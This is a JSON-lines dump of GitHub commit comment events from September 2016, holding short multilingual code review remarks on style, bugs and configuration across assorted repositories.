{"id":"4531020001","type":"CommitCommentEvent","actor":{"login":"duhow"},"repo":{"name":"duhow/ProfesorOak"},"payload":{"comment":{"id":18937900,"position":110,"line":955,"path":"application/controllers/Main.php","commit_id":"261bf1f975fee94bf37b150584ca71e3698647f4","created_at":"2016-09-08T00:01:43Z","updated_at":"2016-09-08T00:01:43Z","body":"Duplicado? Revisar esto."}},"created_at":"2016-09-08T00:01:43Z"}
{"id":"4531021757","type":"CommitCommentEvent","actor":{"login":"TheNetherFires"},"repo":{"name":"Bukkit/Bukkit"},"payload":{"comment":{"id":18937907,"position":null,"line":null,"path":null,"commit_id":"4e8311a6551e8d7794cff73c57a481251b47459c","created_at":"2016-09-08T00:02:14Z","updated_at":"2016-09-08T00:02:14Z","body":"Seems legit."}},"created_at":"2016-09-08T00:02:14Z"}
{"id":"4531025735","type":"CommitCommentEvent","actor":{"login":"LV"},"repo":{"name":"LV/lv.github.io"},"payload":{"comment":{"id":18937925,"position":null,"line":null,"path":null,"commit_id":"226acd243500aed130af89496e25d1306838fa72","created_at":"2016-09-08T00:03:24Z","updated_at":"2016-09-08T00:03:24Z","body":"This is for the duplication error"}},"created_at":"2016-09-08T00:03:24Z"}
{"id":"4531032815","type":"CommitCommentEvent","actor":{"login":"jimmyzhen"},"repo":{"name":"ClinGen/clincoded"},"payload":{"comment":{"id":18937935,"position":4,"line":6,"path":"src/clincoded/static/components/variant_central/interpretation/shared/calculator.js","commit_id":"97edbaa9eb71cb3cd41733d35975b59a29e770ee","created_at":"2016-09-08T00:05:29Z","updated_at":"2016-09-08T00:05:29Z","body":"I think `let` is usually for an object that mutates, while `const` is usually for objects that are immutable. So in this case, I suspect `const` is probably more suitable for declaring the objects.\r\n\r\nIf you really want to embrace ES6, try the `import` syntax in the declarations (e.g. https://github.com/airbnb/javascript/tree/master/react#naming)"}},"created_at":"2016-09-08T00:05:29Z"}
{"id":"4531035471","type":"CommitCommentEvent","actor":{"login":"Nxt3"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18937942,"position":null,"line":null,"path":null,"commit_id":"157b17cef79b6d34518d38355588122b607402a6","created_at":"2016-09-08T00:06:15Z","updated_at":"2016-09-08T00:06:15Z","body":"What was the issue? It resetting in settings?"}},"created_at":"2016-09-08T00:06:15Z"}
{"id":"4531042973","type":"CommitCommentEvent","actor":{"login":"jgarcia100uniandes"},"repo":{"name":"Uniandes-MISO4203/turism-201620-2"},"payload":{"comment":{"id":18937957,"position":5,"line":38,"path":"turism-api/src/main/java/co/edu/uniandes/csw/turism/dtos/minimum/AgencyDTO.java","commit_id":"8ef56c7b7e247594df0fc297c9338bfa3740adcb","created_at":"2016-09-08T00:08:33Z","updated_at":"2016-09-08T00:08:33Z","body":"No sigue estándar de nombrado de atributos de java"}},"created_at":"2016-09-08T00:08:33Z"}
{"id":"4531043220","type":"CommitCommentEvent","actor":{"login":"MrUpyachka"},"repo":{"name":"Binaryvector/HarvestMap"},"payload":{"comment":{"id":18937959,"position":null,"line":null,"path":null,"commit_id":"3502aa1ec8b8edd109431db11b437d4390896365","created_at":"2016-09-08T00:08:39Z","updated_at":"2016-09-08T00:08:39Z","body":"I guess that we have different vision about possible solution. I have not seen before that you started merge. I'm not sure that its good idea, because my reworking not finished yet, I still have not adapted features (HeatMap, Compass, displaying of pins in range).\r\nIf we want to collaborate - we need to discuss more, because in opposite case this merge will have no benefit and will cause only new problems"}},"created_at":"2016-09-08T00:08:39Z"}
{"id":"4531053539","type":"CommitCommentEvent","actor":{"login":"jgarcia100uniandes"},"repo":{"name":"Uniandes-MISO4203/turism-201620-2"},"payload":{"comment":{"id":18937980,"position":4,"line":44,"path":"turism-api/src/main/webapp/WEB-INF/shiro.ini","commit_id":"4d6617c8c2d2d6cae729157ca484e1af61367ab2","created_at":"2016-09-08T00:11:57Z","updated_at":"2016-09-08T00:11:57Z","body":"Esto puede dañar la funcionalidad de categorías"}},"created_at":"2016-09-08T00:11:57Z"}
{"id":"4531058024","type":"CommitCommentEvent","actor":{"login":"ccrama"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18937990,"position":null,"line":null,"path":null,"commit_id":"157b17cef79b6d34518d38355588122b607402a6","created_at":"2016-09-08T00:13:23Z","updated_at":"2016-09-08T00:13:23Z","body":"Nope, doing R.integer.blah is giving you the constant to the pointer in the R class, not the integer itself. It appeared to work as the integer was cached, but sometimes when updating this integer pointer changes (like in this update), and the pointer value was then not recognizable"}},"created_at":"2016-09-08T00:13:23Z"}
{"id":"4531058242","type":"CommitCommentEvent","actor":{"login":"jimmyzhen"},"repo":{"name":"ClinGen/clincoded"},"payload":{"comment":{"id":18937992,"position":11,"line":9,"path":"src/clincoded/static/components/variant_central/interpretation/shared/calculator.js","commit_id":"97edbaa9eb71cb3cd41733d35975b59a29e770ee","created_at":"2016-09-08T00:13:27Z","updated_at":"2016-09-08T00:13:27Z","body":"I think using `let` for creating a component would be syntactically incorrect. Either go with the ES6 `class` (e.g. https://github.com/airbnb/javascript/tree/master/react#class-vs-reactcreateclass-vs-stateless), or continue the use of `var` (e.g. https://facebook.github.io/react/docs/reusable-components.html). "}},"created_at":"2016-09-08T00:13:27Z"}
{"id":"4531062294","type":"CommitCommentEvent","actor":{"login":"TatianaQuevedo"},"repo":{"name":"DANIELAMEDINA15/SEGUNDO-TRIMESTRE"},"payload":{"comment":{"id":18937999,"position":null,"line":null,"path":null,"commit_id":"f5071befe1dbc499a4a2dbf4339eb07b2cd23756","created_at":"2016-09-08T00:14:48Z","updated_at":"2016-09-08T00:14:48Z","body":"En esta trimestre se basó en la realización de la página web grupal,  con lo cual se comenzó haciendo un curso de html para poder desarrollar lo solicitado por el instructor tal como era login  y registro con validación y a su vez se hizo ciertas modificaciones a la exposición del proyecto."}},"created_at":"2016-09-08T00:14:48Z"}
{"id":"4531062568","type":"CommitCommentEvent","actor":{"login":"SocioSain"},"repo":{"name":"SocioSain/C-sW"},"payload":{"comment":{"id":18938000,"position":2,"line":2,"path":"README.md","commit_id":"aa8366a0f160fcea368c742636f0abdb39c75726","created_at":"2016-09-08T00:14:53Z","updated_at":"2016-09-08T00:14:53Z","body":"test"}},"created_at":"2016-09-08T00:14:53Z"}
{"id":"4531066564","type":"CommitCommentEvent","actor":{"login":"haliphax"},"repo":{"name":"haliphax/x84"},"payload":{"comment":{"id":18938015,"position":null,"line":null,"path":null,"commit_id":"00552e94252c3222cd6d3c1f4f6418cb41389e6a","created_at":"2016-09-08T00:16:10Z","updated_at":"2016-09-08T00:16:10Z","body":"I've been tweaking the settings, and this seems like the sweet spot for speed vs. CPU usage. I also eliminated the check for the 'refresh' session event (as it's fairly useless in this context) and skipped the input filter."}},"created_at":"2016-09-08T00:16:10Z"}
{"id":"4531067027","type":"CommitCommentEvent","actor":{"login":"rfriesen"},"repo":{"name":"GBTAmmoniaSurvey/DR1_analysis"},"payload":{"comment":{"id":18938020,"position":null,"line":null,"path":null,"commit_id":"64c0fe9405661cda5a6546cb3c577475f1e2a46e","created_at":"2016-09-08T00:16:20Z","updated_at":"2016-09-08T00:16:20Z","body":"I like going from red to blue but I worry that it's a problem for colorblind folks or for printing in greyscale since it's a diverging colormap. What do you think? "}},"created_at":"2016-09-08T00:16:20Z"}
{"id":"4531071819","type":"CommitCommentEvent","actor":{"login":"Nxt3"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18938030,"position":null,"line":null,"path":null,"commit_id":"157b17cef79b6d34518d38355588122b607402a6","created_at":"2016-09-08T00:17:50Z","updated_at":"2016-09-08T00:17:50Z","body":"Ah, interesting. My bad for not using `getInteger()`. That is the bug I meant though--it wasn't resetting, but it wasn't working properly.\r\n\r\nSo even using `getInteger()` wouldn't have avoided this?"}},"created_at":"2016-09-08T00:17:50Z"}
{"id":"4531076991","type":"CommitCommentEvent","actor":{"login":"jimmyzhen"},"repo":{"name":"ClinGen/clincoded"},"payload":{"comment":{"id":18938044,"position":40,"line":45,"path":"src/clincoded/static/components/variant_central/interpretation/shared/calculator.js","commit_id":"97edbaa9eb71cb3cd41733d35975b59a29e770ee","created_at":"2016-09-08T00:19:34Z","updated_at":"2016-09-08T00:19:34Z","body":"I would probably prefer the following style (less typing):\r\n```\r\nlet pvs_count = 0,\r\n     ps_count = 0,\r\n     pm_count = 0;\r\n```"}},"created_at":"2016-09-08T00:19:34Z"}
{"id":"4531083667","type":"CommitCommentEvent","actor":{"login":"jgarcia100uniandes"},"repo":{"name":"Uniandes-MISO4203/turism-201620-2"},"payload":{"comment":{"id":18938060,"position":4,"line":29,"path":"turism-api/src/main/java/co/edu/uniandes/csw/turism/dtos/minimum/ProductDTO.java","commit_id":"6831fc95050aef40c47c4bcf404b893f5e1b0ec9","created_at":"2016-09-08T00:21:45Z","updated_at":"2016-09-08T00:21:45Z","body":"Probablemente debería usarse java.util.Date"}},"created_at":"2016-09-08T00:21:45Z"}
{"id":"4531083696","type":"CommitCommentEvent","actor":{"login":"bryancall"},"repo":{"name":"apache/trafficserver"},"payload":{"comment":{"id":18938061,"position":null,"line":null,"path":null,"commit_id":"e55b046406af47ba28c76fe3ee5c735b090192ee","created_at":"2016-09-08T00:21:45Z","updated_at":"2016-09-08T00:21:45Z","body":"It should have been on this Jira TS-4811: gcc warning missing-field-initializers"}},"created_at":"2016-09-08T00:21:45Z"}
{"id":"4531085511","type":"CommitCommentEvent","actor":{"login":"LucasVilela"},"repo":{"name":"twlevelup/syd_2016s2_watch_green"},"payload":{"comment":{"id":18938069,"position":null,"line":null,"path":null,"commit_id":"708b229362d445b03c7b608e0492eb70dd221dd3","created_at":"2016-09-08T00:22:22Z","updated_at":"2016-09-08T00:22:22Z","body":"wtf"}},"created_at":"2016-09-08T00:22:22Z"}
{"id":"4531087236","type":"CommitCommentEvent","actor":{"login":"yuji"},"repo":{"name":"movabletype/movabletype"},"payload":{"comment":{"id":18938074,"position":38,"line":100,"path":"lib/MT/Util/Log.pm","commit_id":"6bee689b0566b8293ab411cbf82620cab8d8038f","created_at":"2016-09-08T00:22:58Z","updated_at":"2016-09-08T00:22:58Z","body":"Always call error?"}},"created_at":"2016-09-08T00:22:58Z"}
{"id":"4531088436","type":"CommitCommentEvent","actor":{"login":"sorawee"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18938080,"position":237,"line":494,"path":"src/web/js/trove/d3-lib.js","commit_id":"dc515df3593b75bd82747dc579c1cde873e1fcb1","created_at":"2016-09-08T00:23:23Z","updated_at":"2016-09-08T00:23:23Z","body":"Ah, I see your point now. When `interact` is false, the dialog doesn't appear. There is no resizing button. Thus, there is no way the function will recursively call itself."}},"created_at":"2016-09-08T00:23:23Z"}
{"id":"4531090923","type":"CommitCommentEvent","actor":{"login":"taitetsu"},"repo":{"name":"movabletype/movabletype"},"payload":{"comment":{"id":18938084,"position":38,"line":100,"path":"lib/MT/Util/Log.pm","commit_id":"6bee689b0566b8293ab411cbf82620cab8d8038f","created_at":"2016-09-08T00:24:12Z","updated_at":"2016-09-08T00:24:12Z","body":"Oops"}},"created_at":"2016-09-08T00:24:12Z"}
{"id":"4531093643","type":"CommitCommentEvent","actor":{"login":"TatianaQuevedo"},"repo":{"name":"DANIELAMEDINA15/SEGUNDO-TRIMESTRE"},"payload":{"comment":{"id":18938087,"position":null,"line":null,"path":null,"commit_id":"3a9cec173b7781cecd6fda5ec83625b4300b20bd","created_at":"2016-09-08T00:25:09Z","updated_at":"2016-09-08T00:25:09Z","body":"En este trimestre se terminó el curso php, se hizo consultas joins, php, se realizó el manual técnico, se ajustó el diagrama entidad relación, se hizo modificaciones en la exposición del proyecto, se arreglo el hardware y software del cliente y se arreglo el método de entrevista y encuesta a manera de  grabación."}},"created_at":"2016-09-08T00:25:09Z"}
{"id":"4531096714","type":"CommitCommentEvent","actor":{"login":"failedxyz"},"repo":{"name":"EasyCTF/ctf-calendar"},"payload":{"comment":{"id":18938095,"position":5,"line":12,"path":"cal.py","commit_id":"10c81c9311e1da10bd6cc62d5f3ad5914e4c00e7","created_at":"2016-09-08T00:26:04Z","updated_at":"2016-09-08T00:26:04Z","body":"OK fixed"}},"created_at":"2016-09-08T00:26:04Z"}
{"id":"4531101789","type":"CommitCommentEvent","actor":{"login":"tsheaff"},"repo":{"name":"calmcom/AlamofireImage"},"payload":{"comment":{"id":18938106,"position":null,"line":null,"path":null,"commit_id":"0469d9ebab544478ba6644a9881aba3833ce1a86","created_at":"2016-09-08T00:27:43Z","updated_at":"2016-09-08T00:27:43Z","body":"apologies for the thrash on reverts here, was testing something out on my side.\r\n\r\nIf we want a dependency on Alamofire that only supports iOS >= 9, it makes sense that AlamofireImage only supports iOS >= 9"}},"created_at":"2016-09-08T00:27:43Z"}
{"id":"4531103064","type":"CommitCommentEvent","actor":{"login":"jimmyzhen"},"repo":{"name":"ClinGen/clincoded"},"payload":{"comment":{"id":18938108,"position":null,"line":null,"path":"src/clincoded/static/components/variant_central/interpretation/shared/calculator.js","commit_id":"97edbaa9eb71cb3cd41733d35975b59a29e770ee","created_at":"2016-09-08T00:28:07Z","updated_at":"2016-09-08T00:28:07Z","body":"Are all those `bootstrap` @classes at Line **182** and **183** absolutely required? I think if a `container` @class is added to the existing `progress-bar-area` @class, the `div` would likely inherit the full width from its parent."}},"created_at":"2016-09-08T00:28:07Z"}
{"id":"4531104352","type":"CommitCommentEvent","actor":{"login":"IoTeacher"},"repo":{"name":"tectijuana/interfaz"},"payload":{"comment":{"id":18938109,"position":null,"line":null,"path":null,"commit_id":"b7894ffca5a684d3aaa68e7cf678e5ec276bdc84","created_at":"2016-09-08T00:28:31Z","updated_at":"2016-09-08T00:28:31Z","body":"**Este programa no es ARM es para CISC (intel compatibles x86)**"}},"created_at":"2016-09-08T00:28:31Z"}
{"id":"4531106906","type":"CommitCommentEvent","actor":{"login":"ebracho"},"repo":{"name":"ebracho/news"},"payload":{"comment":{"id":18938119,"position":null,"line":null,"path":null,"commit_id":"de345008e62c24948484431f18546c475abd896d","created_at":"2016-09-08T00:29:54Z","updated_at":"2016-09-08T00:29:54Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;Dpjg8mjt&#x2F;1-layout-project-file-structure\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Layout project file structure</a>"}},"created_at":"2016-09-08T00:29:54Z"}
{"id":"4531107256","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":18938120,"position":null,"line":null,"path":null,"commit_id":"d2adfc2bb7cebcde93a0d74004d5f342468bb5d3","created_at":"2016-09-08T00:30:12Z","updated_at":"2016-09-08T00:30:12Z","body":"👍 "}},"created_at":"2016-09-08T00:30:12Z"}
{"id":"4531107721","type":"CommitCommentEvent","actor":{"login":"onezero1010101"},"repo":{"name":"jpmens/homie-ota"},"payload":{"comment":{"id":18938123,"position":null,"line":null,"path":null,"commit_id":"61d0766ee84c133fb6f2b2ff6da78fbd59f7b4d5","created_at":"2016-09-08T00:30:35Z","updated_at":"2016-09-08T00:30:35Z","body":"How does one go about running this docker image?  I built it on my pi, but when I try to docker run homie-ota it errors out.\r\n\r\nTraceback (most recent call last):\r\n  File \"homie-ota.py\", line 38, in <module>\r\n    DEBUG = config.getboolean(\"global\", \"DEBUG\")\r\n  File \"/usr/lib/python2.7/ConfigParser.py\", line 368, in getboolean\r\n    v = self.get(section, option)\r\n  File \"/usr/lib/python2.7/ConfigParser.py\", line 330, in get\r\n    raise NoSectionError(section)\r\nConfigParser.NoSectionError: No section: 'global'\r\n"}},"created_at":"2016-09-08T00:30:35Z"}
{"id":"4531108444","type":"CommitCommentEvent","actor":{"login":"ebracho"},"repo":{"name":"ebracho/news"},"payload":{"comment":{"id":18938127,"position":null,"line":null,"path":null,"commit_id":"a676a24988878e3fc86a24625a963469a6219087","created_at":"2016-09-08T00:31:14Z","updated_at":"2016-09-08T00:31:14Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;ovPuy1Ay&#x2F;3-implement-article-model\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Implement Article model.</a>"}},"created_at":"2016-09-08T00:31:14Z"}
{"id":"4531108883","type":"CommitCommentEvent","actor":{"login":"ebracho"},"repo":{"name":"ebracho/news"},"payload":{"comment":{"id":18938132,"position":null,"line":null,"path":null,"commit_id":"9ad1739453c8d7543c003a0619169ff679f46a54","created_at":"2016-09-08T00:31:34Z","updated_at":"2016-09-08T00:31:34Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;9IBpur7g&#x2F;2-implement-scheduled-task-for-scraping-articles\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Implement scheduled task for scraping articles</a>"}},"created_at":"2016-09-08T00:31:34Z"}
{"id":"4531109586","type":"CommitCommentEvent","actor":{"login":"jimmyzhen"},"repo":{"name":"ClinGen/clincoded"},"payload":{"comment":{"id":18938135,"position":null,"line":null,"path":"src/clincoded/static/components/variant_central/interpretation/shared/calculator.js","commit_id":"97edbaa9eb71cb3cd41733d35975b59a29e770ee","created_at":"2016-09-08T00:31:54Z","updated_at":"2016-09-08T00:31:54Z","body":"For Line 240, if it is a stateless function, you can probably just use the normal function syntax (e.g. https://github.com/airbnb/javascript/tree/master/react#class-vs-reactcreateclass-vs-stateless)."}},"created_at":"2016-09-08T00:31:54Z"}
{"id":"4531112681","type":"CommitCommentEvent","actor":{"login":"orta"},"repo":{"name":"johnno1962/injectionforxcode"},"payload":{"comment":{"id":18938144,"position":153,"line":274,"path":"InjectionPluginLite/Classes/IvarAccess.h","commit_id":"4f6f35d708d3005199f5eb383fe59b88249747f6","created_at":"2016-09-08T00:32:45Z","updated_at":"2016-09-08T00:32:45Z","body":"dang, that's some serious code"}},"created_at":"2016-09-08T00:32:45Z"}
{"id":"4531115228","type":"CommitCommentEvent","actor":{"login":"iesoros"},"repo":{"name":"iesoros/example"},"payload":{"comment":{"id":18938153,"position":null,"line":null,"path":null,"commit_id":"74a8cc879b124d6ca38553cfc5fe50728ff42c03","created_at":"2016-09-08T00:33:33Z","updated_at":"2016-09-08T00:33:33Z","body":"aaa"}},"created_at":"2016-09-08T00:33:33Z"}
{"id":"4531115912","type":"CommitCommentEvent","actor":{"login":"UnbendableStraw"},"repo":{"name":"Track44/mainsite"},"payload":{"comment":{"id":18938155,"position":12,"line":95,"path":"index.html","commit_id":"2b8222b33e14e328ed4190650fd6494b9155a8ba","created_at":"2016-09-08T00:33:47Z","updated_at":"2016-09-08T00:33:47Z","body":"ur bad. doesnt even matter because shows as all caps when the site is loaded"}},"created_at":"2016-09-08T00:33:47Z"}
{"id":"4531120797","type":"CommitCommentEvent","actor":{"login":"UnbendableStraw"},"repo":{"name":"Track44/mainsite"},"payload":{"comment":{"id":18938166,"position":17,"line":99,"path":"index.html","commit_id":"2b8222b33e14e328ed4190650fd6494b9155a8ba","created_at":"2016-09-08T00:35:22Z","updated_at":"2016-09-08T00:35:22Z","body":"counterstrike, not cs:go. There are multiple variants of counterstrike servers (GO, 1.6) that people want hosted and it was quicker to say Counterstrike than list CS:GO and Counterstrike 1.6 as separate servers coming soon. We are also running out of vertical space before the gif on the left looks like shit"}},"created_at":"2016-09-08T00:35:22Z"}
{"id":"4531122296","type":"CommitCommentEvent","actor":{"login":"microdee"},"repo":{"name":"microdee/VVVV.OpenVR"},"payload":{"comment":{"id":18938167,"position":29,"line":29,"path":"src/VVVV.OpenVR.Nodes/Nodes/OpenVRProducerNode.cs","commit_id":"f62aa3c9d0d0c7ab6dc3fd90d36248a8a4d6212b","created_at":"2016-09-08T00:35:47Z","updated_at":"2016-09-08T00:35:47Z","body":"here's that wait stuff, it's actually pretty simple. known bug here is that first couple of frames should be waiting to get compositor working. I have no idea why. for now I'm solving it in patch, just writing here FYI"}},"created_at":"2016-09-08T00:35:47Z"}
{"id":"4531125643","type":"CommitCommentEvent","actor":{"login":"pandada8"},"repo":{"name":"lastavenger/bots"},"payload":{"comment":{"id":18938171,"position":null,"line":null,"path":null,"commit_id":"2e4bf6d3db9924b045f1eab23a7c3b7340cd7761","created_at":"2016-09-08T00:36:50Z","updated_at":"2016-09-08T00:36:50Z","body":"wow LA 好厉害"}},"created_at":"2016-09-08T00:36:50Z"}
{"id":"4531129807","type":"CommitCommentEvent","actor":{"login":"jimmyzhen"},"repo":{"name":"ClinGen/clincoded"},"payload":{"comment":{"id":18938182,"position":null,"line":null,"path":null,"commit_id":"12c58127a20decca673b11c427def3b0d966cc53","created_at":"2016-09-08T00:38:15Z","updated_at":"2016-09-08T00:38:15Z","body":"I think Line 1701 through 1751 can probably use a bit more organization and the removal of duplications."}},"created_at":"2016-09-08T00:38:15Z"}
{"id":"4531131807","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"schonmann/EDL"},"payload":{"comment":{"id":18938184,"position":null,"line":null,"path":null,"commit_id":"588cab99cb340970e528b4c373457eda48893c05","created_at":"2016-09-08T00:38:57Z","updated_at":"2016-09-08T00:38:57Z","body":"As suas últimas versões pararam de rodar aqui...\r\nAí está funcionando?"}},"created_at":"2016-09-08T00:38:57Z"}
{"id":"4531137321","type":"CommitCommentEvent","actor":{"login":"pranavenzo"},"repo":{"name":"pranavenzo/JAVAProjects"},"payload":{"comment":{"id":18938196,"position":null,"line":null,"path":null,"commit_id":"1e2371091cfb6d869adf533269674c94a7fc5b45","created_at":"2016-09-08T00:40:53Z","updated_at":"2016-09-08T00:40:53Z","body":"Finds the 2's Complement of a number"}},"created_at":"2016-09-08T00:40:53Z"}
{"id":"4531138673","type":"CommitCommentEvent","actor":{"login":"KnightMiner"},"repo":{"name":"SlimeKnights/TinkersConstruct"},"payload":{"comment":{"id":18938201,"position":null,"line":null,"path":null,"commit_id":"9466eba928ac2918380e6e3ba97f80f431b3a127","created_at":"2016-09-08T00:41:22Z","updated_at":"2016-09-08T00:41:22Z","body":"Yeah, I'll push a quick PR."}},"created_at":"2016-09-08T00:41:22Z"}
{"id":"4531142551","type":"CommitCommentEvent","actor":{"login":"hitchcme"},"repo":{"name":"hitchcme/WSTF_Sniffer"},"payload":{"comment":{"id":18938216,"position":null,"line":null,"path":null,"commit_id":"19e42e667aa9cbfc84bc50ad5778531677435af6","created_at":"2016-09-08T00:42:48Z","updated_at":"2016-09-08T00:42:48Z","body":"I'm moving this to the Slave1 source directory"}},"created_at":"2016-09-08T00:42:48Z"}
{"id":"4531144000","type":"CommitCommentEvent","actor":{"login":"UAVXP"},"repo":{"name":"SourceCommunityEditionTeam/SourceCommunityEdition"},"payload":{"comment":{"id":18938219,"position":null,"line":null,"path":null,"commit_id":"31320bd1b44fe850d1efb096c3c7bc9933036c2f","created_at":"2016-09-08T00:43:19Z","updated_at":"2016-09-08T00:43:19Z","body":"#6 "}},"created_at":"2016-09-08T00:43:19Z"}
{"id":"4531144919","type":"CommitCommentEvent","actor":{"login":"UAVXP"},"repo":{"name":"SourceCommunityEditionTeam/SourceCommunityEdition"},"payload":{"comment":{"id":18938221,"position":null,"line":null,"path":null,"commit_id":"c22b47fb47bcb3ce2f0c5f5e5d1397777b0ec95b","created_at":"2016-09-08T00:43:39Z","updated_at":"2016-09-08T00:43:39Z","body":"#6 "}},"created_at":"2016-09-08T00:43:39Z"}
{"id":"4531145114","type":"CommitCommentEvent","actor":{"login":"UAVXP"},"repo":{"name":"SourceCommunityEditionTeam/SourceCommunityEdition"},"payload":{"comment":{"id":18938222,"position":null,"line":null,"path":null,"commit_id":"4eaaa2fa7df002cfe866bcfc218d2687fa3a84f0","created_at":"2016-09-08T00:43:43Z","updated_at":"2016-09-08T00:43:43Z","body":"#6 "}},"created_at":"2016-09-08T00:43:43Z"}
{"id":"4531145291","type":"CommitCommentEvent","actor":{"login":"UAVXP"},"repo":{"name":"SourceCommunityEditionTeam/SourceCommunityEdition"},"payload":{"comment":{"id":18938223,"position":null,"line":null,"path":null,"commit_id":"fe89faa9ebee85337600bc6b4ee740d3b7f18eba","created_at":"2016-09-08T00:43:47Z","updated_at":"2016-09-08T00:43:47Z","body":"#6 "}},"created_at":"2016-09-08T00:43:47Z"}
{"id":"4531151359","type":"CommitCommentEvent","actor":{"login":"UAVXP"},"repo":{"name":"SourceCommunityEditionTeam/SourceCommunityEdition"},"payload":{"comment":{"id":18938237,"position":null,"line":null,"path":null,"commit_id":"33c266ea2c8f1081ca81db8e2e93206d3d2a842c","created_at":"2016-09-08T00:46:02Z","updated_at":"2016-09-08T00:46:02Z","body":"#6 "}},"created_at":"2016-09-08T00:46:02Z"}
{"id":"4531154711","type":"CommitCommentEvent","actor":{"login":"xubitao"},"repo":{"name":"aochuanliu/GrapInfoTool"},"payload":{"comment":{"id":18938245,"position":21,"line":20,"path":"GrapInfoTool.java","commit_id":"6d022247c79aba56a59cc843443c932e2551cf57","created_at":"2016-09-08T00:47:10Z","updated_at":"2016-09-08T00:47:10Z","body":"此处需要添加类修饰符；"}},"created_at":"2016-09-08T00:47:10Z"}
{"id":"4531158474","type":"CommitCommentEvent","actor":{"login":"mrose17"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18938248,"position":null,"line":null,"path":null,"commit_id":"8d0dd96cc73e3c78f1028b1caa5bea817f987b48","created_at":"2016-09-08T00:48:13Z","updated_at":"2016-09-08T00:48:13Z","body":"looks right to me (even if i would prefer a non-zero number of parens (-;"}},"created_at":"2016-09-08T00:48:13Z"}
{"id":"4531161622","type":"CommitCommentEvent","actor":{"login":"datakurre"},"repo":{"name":"plone/plone.app.mosaic"},"payload":{"comment":{"id":18938259,"position":null,"line":null,"path":null,"commit_id":"926ebf2f2c83fae66c56b3295264ee0143887c39","created_at":"2016-09-08T00:49:18Z","updated_at":"2016-09-08T00:49:18Z","body":"@vangheem Why @import (reference) \"@{barcelonetaPath}/less/mixin.grid.plone.less\"; did not work in dev mode? barcelonetaPath should be in Plone less variables."}},"created_at":"2016-09-08T00:49:18Z"}
{"id":"4531163006","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18938270,"position":34,"line":34,"path":"bootstrap.ps1","commit_id":"948e2e428bea72140fcd0ec7fe075e2a16e6f34e","created_at":"2016-09-08T00:49:44Z","updated_at":"2016-09-08T00:49:44Z","body":"As you called out we need a VSTS equivalent. "}},"created_at":"2016-09-08T00:49:44Z"}
{"id":"4531164065","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18938272,"position":63,"line":63,"path":"bootstrap.ps1","commit_id":"948e2e428bea72140fcd0ec7fe075e2a16e6f34e","created_at":"2016-09-08T00:50:04Z","updated_at":"2016-09-08T00:50:04Z","body":"This will need a VSTS equivalent at some point as well. "}},"created_at":"2016-09-08T00:50:04Z"}
{"id":"4531165405","type":"CommitCommentEvent","actor":{"login":"tetriscode"},"repo":{"name":"boundlessgeo/spatialconnect-android-sdk"},"payload":{"comment":{"id":18938276,"position":25,"line":84,"path":"spatialconnect/src/main/java/com/boundlessgeo/spatialconnect/stores/LocationStore.java","commit_id":"4445ba918dc59faff278dd9809361fe6c8c3db70","created_at":"2016-09-08T00:50:33Z","updated_at":"2016-09-08T00:50:33Z","body":"No need to replyTo here. This is a fire and forget message. "}},"created_at":"2016-09-08T00:50:33Z"}
{"id":"4531167000","type":"CommitCommentEvent","actor":{"login":"xubitao"},"repo":{"name":"aochuanliu/GrapInfoTool"},"payload":{"comment":{"id":18938281,"position":40,"line":39,"path":"GrapInfoTool.java","commit_id":"6d022247c79aba56a59cc843443c932e2551cf57","created_at":"2016-09-08T00:51:05Z","updated_at":"2016-09-08T00:51:05Z","body":"尽量不要使用内部类，外部层次不明确；"}},"created_at":"2016-09-08T00:51:05Z"}
{"id":"4531171207","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18938286,"position":16,"line":16,"path":"run.ps1","commit_id":"948e2e428bea72140fcd0ec7fe075e2a16e6f34e","created_at":"2016-09-08T00:52:28Z","updated_at":"2016-09-08T00:52:28Z","body":"I assume this is going to be in build tools repo?"}},"created_at":"2016-09-08T00:52:28Z"}
{"id":"4531172945","type":"CommitCommentEvent","actor":{"login":"codebio"},"repo":{"name":"fomdesis/tinjaca"},"payload":{"comment":{"id":18938289,"position":null,"line":null,"path":null,"commit_id":"364afe1127434272b6c24afd6f01409ef9c6cee4","created_at":"2016-09-08T00:53:03Z","updated_at":"2016-09-08T00:53:03Z","body":"Corrección es para la versión v9.0c"}},"created_at":"2016-09-08T00:53:03Z"}
{"id":"4531174118","type":"CommitCommentEvent","actor":{"login":"xubitao"},"repo":{"name":"aochuanliu/GrapInfoTool"},"payload":{"comment":{"id":18938293,"position":77,"line":67,"path":"GrapInfoTool.java","commit_id":"6d022247c79aba56a59cc843443c932e2551cf57","created_at":"2016-09-08T00:53:28Z","updated_at":"2016-09-08T00:53:28Z","body":"类通常是一个事物，它的名字通常也是个名词，而不是一个动词。比如`ParseContent`实质是一个解析器，那么它的名字可能就是`Parser`或者`ContentParser`."}},"created_at":"2016-09-08T00:53:28Z"}
